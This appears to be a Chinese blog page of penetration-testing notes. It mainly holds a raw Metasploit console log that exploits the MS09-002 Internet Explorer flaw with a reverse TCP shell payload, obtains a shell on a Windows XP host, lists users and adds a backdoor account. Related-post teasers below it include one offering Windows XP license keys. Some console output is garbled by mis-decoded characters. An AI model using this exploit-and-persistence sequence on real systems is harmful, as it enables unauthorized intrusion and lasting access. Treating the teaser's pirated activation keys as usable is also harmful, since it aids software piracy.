Welcome to the Metasploit Web Console!

| | _) |

__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|

| | | __/ | ( |\__ \ | | | ( | | |

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 308 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 308 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/browser/ms09_002_memory_corruption

>> set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> set SRVHOST 172.16.2.100

SRVHOST => 172.16.2.100

>> set LHOST 172.16.2.100

LHOST => 172.16.2.100

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 172.16.2.100 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 172.16.2.100 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> exploit

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.2.100:4444

[*] Using URL: http://172.16.2.100:8080/9wZVWxuy

[*] Server started.

>> back

>> sessions -l

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

1 shell 172.16.2.100:4444 -> 172.16.2.120:1125

>> sessions -i 1

sessions -i 1

'sessions' 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò

?ò?ú′|àí???t?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> ipconfig /all

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : www-95a235b5556

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

SUPPORT_388945a0

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user shentouceshiwy /add

net user shentouceshiwy /add

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

shentouceshiwy SUPPORT_388945a0

?üá?3é1|íê3é?£

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7的更多相关文章

  1. Windows XP PRO SP3 - Full ROP calc shellcode

    /*     Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode     Author: b33f (http://www.fuzzysec ...

  2. Windows XP with SP3大客户免激活日文版

    原贴地址:http://www.humin.com.cn/ja_windows_xp_professional_with_service_pack_3_x86_dvd_vl_x14-74058-iso ...

  3. “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windows XP Professional.vmx" was created by a VMware product

    “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windo ...

  4. 渗透测试实例Windows XP SP2

    一.msf> use exploit/windows/dcerpc/ms03_026_dcom.看到命令提示符的改变表明该命令已经运行成功. 二.为漏洞利用代码设置必要的参数,show opti ...

  5. Windows XP SP2上安装.net 4

    1.安装 KB893803-v2-x86 2.安装dotnetfx35 3.安装dotNetFx40_Client_x86_x64 4.安装 NET Framework 4.0

  6. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  7. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  8. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  9. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  10. 最新的windows xp sp3序列号(绝对可通过正版验证)

    MRX3F-47B9T-2487J-KWKMF-RPWBY(工行版) 可用(强推此号) QC986-27D34-6M3TY-JJXP9-TBGMD(台湾交大学生版) 可用 CM3HY-26VYW-6J ...

随机推荐

  1. NSMutableRLEArray objectAtIndex:effectiveRange:: Out of bounds

     Bugly:  Trapped uncaught exception 'NSRangeException', reason: 'NSMutableRLEArray objectAtIndex:eff ...

  2. C++学习笔记 知识集锦(一)

    1.内存管理的开销 2.函数调用框架 3.类为什么要定义在头文件 4.C++的组合 5.在类的外部定义成员函数 6.bool类型为什么可以当做int类型 7.无符号保留原则 8.C++类型检查 9.何 ...

  3. Peter Norvig:自学编程,十年磨一剑

    若要在某一领域内达到专家级的水平,其关键在于"审慎地重复",也就是说,并非是机械地,一遍又一遍地练习,而是要不断地挑战自我,试图超越自身当前的水平,通过不断的尝试挑战,并在尝试的过 ...

  4. tomcat在linux中启动慢的解决方案

    有两种解决办法: 1)在Tomcat环境中解决 可以通过配置JRE使用非阻塞的Entropy Source. 在catalina.sh中加入这么一行:-Djava.security.egd=file: ...

  5. linux上监控tomcat down掉后自动重启tomcat

    p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "Helvetica Neue"; color: #454545 } p. ...

  6. C# DataTable中根据某Column值(不重复)获取该值所在行

    System.Data.DataTable dt = new System.Data.DataTable(); dt.PrimaryKey = new System.Data.DataColumn[] ...

  7. c++友元函数

    c++友元函数分两类: 一://友员全居函数 /*#include <iostream>using namespace std;class aaa{    friend void prin ...

  8. [Asp.net]Uploadify上传大文件,Http error 404 解决方案

    引言 之前使用Uploadify做了一个上传图片并预览的功能,今天在项目中,要使用该插件上传大文件.之前弄过上传图片的demo,就使用该demo进行测试.可以查看我的这篇文章:[Asp.net]Upl ...

  9. 无语啊,sublime给我弄乱玩,玩坏了,而且安装插件也安装不了

    国内的什么插件地址都TMMD失效了,没办法,只能翻"强"到外面找了,而且找了很多也用不了,所以收藏一个为了预防以后不行有补救的方法: 百度的99%都不行,不是报这个错就是那个错,可 ...

  10. js基础练习三之数码时钟

    这章节有两个实例,1,定时器的使用; 2,数码时钟; 用到的js知识:定时器,Date对象. >>>>>定时器 开启定时器: setInterval 间隔型 setTim ...